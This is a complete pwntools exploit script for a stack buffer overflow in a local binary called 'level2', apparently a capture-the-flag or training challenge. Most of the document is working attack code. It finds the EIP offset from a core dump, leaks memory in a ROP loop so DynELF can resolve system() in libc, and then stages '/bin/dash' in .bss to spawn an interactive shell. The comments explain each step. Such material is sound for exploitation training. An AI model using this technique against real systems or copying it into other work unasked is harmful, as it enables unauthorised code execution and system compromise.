from pwn import * | |
# Intel-syntax disassembly of the two functions in ./level2 that matter for the exploit (kept for reference):
""" | |
0804844b <vulnerable_function>: | |
804844b: 55 push ebp | |
804844c: 89 e5 mov ebp,esp | |
804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
8048454: 83 ec 04 sub esp,0x4 | |
8048457: 68 00 01 00 00 push 0x100 | |
804845c: 8d 85 78 ff ff ff lea eax,[ebp-0x88] | |
8048462: 50 push eax | |
8048463: 6a 00 push 0x0 | |
8048465: e8 a6 fe ff ff call 8048310 <read@plt> | |
804846a: 83 c4 10 add esp,0x10 | |
804846d: c9 leave | |
804846e: c3 ret | |
0804846f <main>: | |
804846f: 8d 4c 24 04 lea ecx,[esp+0x4] | |
8048473: 83 e4 f0 and esp,0xfffffff0 | |
8048476: ff 71 fc push DWORD PTR [ecx-0x4] | |
8048479: 55 push ebp | |
804847a: 89 e5 mov ebp,esp | |
804847c: 51 push ecx | |
804847d: 83 ec 04 sub esp,0x4 | |
8048480: e8 c6 ff ff ff call 804844b <vulnerable_function> | |
8048485: 83 ec 04 sub esp,0x4 | |
8048488: 6a 0d push 0xd | |
804848a: 68 30 85 04 08 push 0x8048530 | |
804848f: 6a 01 push 0x1 | |
8048491: e8 aa fe ff ff call 8048340 <write@plt> | |
8048496: 83 c4 10 add esp,0x10 | |
8048499: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4] | |
804849c: c9 leave | |
804849d: 8d 61 fc lea esp,[ecx-0x4] | |
80484a0: c3 ret | |
""" | |
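# Load the target ELF from disk. ROP() takes its gadgets from it and DynELF
# its headers; the fixed 0x0804xxxx addresses in the disassembly above show
# the binary is not PIE, so nothing needs relocating.
elf = ELF('./level2')

# Step 1: find the offset of the saved return address inside the buffer that
# read() fills in vulnerable_function, empirically: crash the program with a
# de Bruijn pattern and look up which 4 pattern bytes ended up in EIP.
# read() at 0x8048465 only consumes 0x100 bytes, so 1024 is more than enough.
io = process('./level2')
io.sendline(cyclic(1024))
# Block until the process has died (EOF) so the core file exists before we
# try to open it.
io.recvall()
# NOTE: assumes core dumps are enabled (ulimit -c unlimited) and that
# kernel.core_pattern leaves a file called 'core' in the working directory.
core = Core('core')
eip = cyclic_find(core.eip)
# cyclic_find() returns -1 when EIP does not hold a pattern value (e.g. the
# crash happened somewhere else). Carrying -1 on would place the ROP chain at
# a bogus offset, so fail loudly here instead (pwntools' log.error raises).
if eip < 0:
    log.error("EIP was not overwritten by the pattern (eip=%#x)" % core.eip)
log.info("EIP control @ %i" % eip)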
# The probe above was deliberately crashed for its core dump; start a fresh
# instance for the real exploit. process() accepts argv as a list too.
io = process(['./level2'])
# Create a ROP stack to dump the GOT and return to main() | |
# so we can exploit again. | |
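@MemLeak
def leak(address):
    """Leak 4 bytes of target memory at ``address``.

    Used by DynELF to walk the target's own dynamic-linker structures and
    resolve ``system`` in libc without a local libc copy. Each call smashes
    the stack once: ``write(1, address, 4)`` sends the bytes back over stdout,
    then the chain returns into ``main()`` so ``vulnerable_function()`` calls
    ``read()`` again and the next leak payload can be delivered.

    Returns the 4 leaked bytes, or ``None`` when the target did not answer
    within the timeout (typically ``write()`` failing with EFAULT on an
    unmapped address). MemLeak treats ``None`` as a failed read, so the
    lookup can move on instead of blocking forever.
    """
    rop = ROP(elf)
    rop.write(1, address, 4)
    rop.main()
    io.send(fit({
        eip: str(rop)
    }))
    # write(2) on an unmapped page emits nothing; the process is then already
    # back in read() waiting for the next payload, so a bounded wait keeps us
    # in sync instead of hanging the whole DynELF resolution.
    data = io.recvn(4, timeout=2)
    if len(data) != 4:
        # recvn() puts any partial bytes back into the buffer on timeout;
        # discard them so the next leak's 4-byte reply stays aligned.
        io.clean(0)
        return None
    return data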
# Resolve system() in the remote libc. DynELF walks the target's own link_map
# and dynamic sections through leak(), so no local libc copy or known offsets
# are required.
de = DynELF(leak, elf=elf)
system = de.lookup(symb='system', lib='libc')
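# Final stage: stage the command string in .bss with read(2), then call
# system() on it. .bss is writable, at a fixed address (non-PIE binary) and
# untouched by the stack smash, so it is a safe home for the string.
rop = ROP(elf)
bin_dash = '/bin/dash\x00'
rop.read(0, elf.bss(), len(bin_dash))
rop.call(system, [elf.bss()])

# str(rop) is the Python 2 pwntools spelling of the chain bytes.
payload = fit({
    eip: str(rop)
})
# Pad the payload to exactly the 0x100 bytes that read() in vulnerable_function
# asks for. Both sends below may sit in the pipe before the target calls
# read(); without the padding the first read() could also swallow the command
# string and the second read() would block forever.
if len(payload) > 0x100:
    log.error("payload is %i bytes, but read() only takes 0x100" % len(payload))
payload = payload.ljust(0x100, 'A')
io.send(payload)

# read(0, .bss, 10) is now waiting for the command string; the original
# script built it but never sent it.
io.send(bin_dash)
io.interactive()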